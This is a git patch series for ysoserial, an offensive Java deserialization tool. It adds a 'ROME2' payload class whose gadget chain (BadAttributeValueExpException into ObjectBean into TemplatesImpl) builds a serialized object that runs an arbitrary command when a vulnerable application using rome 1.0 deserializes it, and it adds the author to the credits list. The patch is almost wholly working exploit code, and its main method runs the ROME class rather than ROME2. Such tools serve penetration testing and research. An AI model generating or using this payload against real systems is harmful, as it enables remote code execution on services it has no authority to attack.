From 16b943a547fde61bba932a28c6d96f2af5aa79db Mon Sep 17 00:00:00 2001
From: Firebasky <63966847+Firebasky@users.noreply.github.com>
Date: Fri, 10 Sep 2021 20:52:20 +0800
Subject: [PATCH 1/2] Create ROME2.java

---
 src/main/java/ysoserial/payloads/ROME2.java | 36 +++++++++++++++++++++
 1 file changed, 36 insertions(+)
 create mode 100644 src/main/java/ysoserial/payloads/ROME2.java

diff --git a/src/main/java/ysoserial/payloads/ROME2.java b/src/main/java/ysoserial/payloads/ROME2.java
new file mode 100644
index 00000000..24dc5ad3
--- /dev/null
+++ b/src/main/java/ysoserial/payloads/ROME2.java
@@ -0,0 +1,36 @@
+package ysoserial.payloads;
+
+import com.sun.syndication.feed.impl.ObjectBean;
+import ysoserial.payloads.annotation.Authors;
+import ysoserial.payloads.annotation.Dependencies;
+import ysoserial.payloads.util.Gadgets;
+import ysoserial.payloads.util.PayloadRunner;
+import ysoserial.payloads.util.Reflections;
+import javax.management.BadAttributeValueExpException;
+import javax.xml.transform.Templates;
+
+/**
+ * @author:Firebasky
+ * BadAttributeValueExpException.readObject()
+ *    ToStringBean.toString()
+ *        TemplatesImpl.getOutputProperties()
+ */
+
+@Dependencies("rome:rome:1.0")
+@Authors({ Authors.Firebasky })
+public class ROME2 implements ObjectPayload<Object> {
+
+    public Object getObject ( String command ) throws Exception {
+
+        Object o = Gadgets.createTemplatesImpl(command);
+        ObjectBean delegate = new ObjectBean(Templates.class, o);
+        BadAttributeValueExpException b = new BadAttributeValueExpException ("");
+        Reflections.setFieldValue (b, "val", delegate);
+        return b;
+    }
+
+    public static void main ( final String[] args ) throws Exception {
+        PayloadRunner.run(ROME.class, args);
+    }
+
+}

From 837090079a6822b52992e849fdb2591af92b4f31 Mon Sep 17 00:00:00 2001
From: Firebasky <63966847+Firebasky@users.noreply.github.com>
Date: Fri, 10 Sep 2021 20:52:46 +0800
Subject: [PATCH 2/2] Update Authors.java

---
 src/main/java/ysoserial/payloads/annotation/Authors.java | 1 +
 1 file changed, 1 insertion(+)

diff --git a/src/main/java/ysoserial/payloads/annotation/Authors.java b/src/main/java/ysoserial/payloads/annotation/Authors.java
index 48c9408d..d62b2a7e 100644
--- a/src/main/java/ysoserial/payloads/annotation/Authors.java
+++ b/src/main/java/ysoserial/payloads/annotation/Authors.java
@@ -25,6 +25,7 @@
     String EDOARDOVIGNATI = "EdoardoVignati";
     String JANG = "Jang";
     String ARTSPLOIT = "artsploit";
+    String Firebasky = "Firebasky";
 
     String[] value() default {};